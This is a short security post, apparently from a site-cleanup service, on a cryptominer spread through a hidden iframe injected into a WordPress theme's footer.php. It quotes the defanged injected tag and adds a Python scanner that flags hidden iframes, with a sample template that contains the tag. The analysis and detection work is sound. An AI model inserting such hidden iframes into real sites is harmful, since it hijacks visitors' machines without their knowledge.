Malicious Cryptominers from GitHub
Recently, a webmaster contacted us after his AVG antivirus reported a JS:Miner-C [Trj] infection on his site.
Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:
<iframe src="hxxps://wpupdates.github[.]io/ping/" style="width:0;heigh:0;border:none;"></iframe>
When we opened the URL in a browser, the page was blank.
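To sweep theme templates for iframes like the one found in footer.php, here is an added example (not code from the original post): a Python scanner that flags iframes hidden by inline style or attributes. The function names and the constructed sample template are assumptions. It treats a single zero dimension as hidden, because browsers ignore the misspelled heigh property in the injected tag and only width:0 takes effect.

```python
import re
from html.parser import HTMLParser

# A zero-length CSS/HTML dimension such as 0, 0px or 0.0em.
ZERO = re.compile(r"^0+(\.0+)?(px|em|rem|%|pt)?$")

# Constructed sample template: the injected tag from the post plus a benign iframe.
SAMPLE = '''<footer>
<?php wp_footer(); ?>
<iframe src="hxxps://wpupdates.github[.]io/ping/" style="width:0;heigh:0;border:none;"></iframe>
<iframe src="/embed/map" width="600" height="400"></iframe>
</footer>'''

def parse_style(style):
    """Return {property: value} from an inline style attribute."""
    pairs = (d.partition(":") for d in style.split(";"))
    return {n.strip().lower(): v.strip().lower() for n, sep, v in pairs if sep}

def hidden_reasons(attrs):
    """List the reasons an iframe would be invisible to a visitor."""
    css = parse_style(attrs.get("style") or "")
    reasons = []
    for dim in ("width", "height"):
        # Either dimension at zero hides the frame, so do not require both.
        for source, value in ((f"style {dim}", css.get(dim)), (f"attr {dim}", attrs.get(dim))):
            if value and ZERO.match(value.strip().lower()):
                reasons.append(f"{source}={value}")
    if css.get("display") == "none":
        reasons.append("display:none")
    return reasons

class IframeFinder(HTMLParser):
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            a = {k: (v or "") for k, v in attrs}
            reasons = hidden_reasons(a)
            if reasons:
                # getpos() gives (line, column) of the tag being parsed.
                self.findings.append((self.getpos()[0], a.get("src", ""), reasons))

def scan(text):
    """Return [(line, src, reasons)] for each hidden iframe in a template."""
    finder = IframeFinder()
    finder.findings = []
    finder.feed(text)
    finder.close()
    return finder.findings

if __name__ == "__main__":
    for line, src, reasons in scan(SAMPLE):
        print(f"line {line}: hidden iframe src={src!r} ({', '.join(reasons)})")
```

A hit is a lead to review, not a verdict: compare the flagged template against a clean copy of the theme before removing anything.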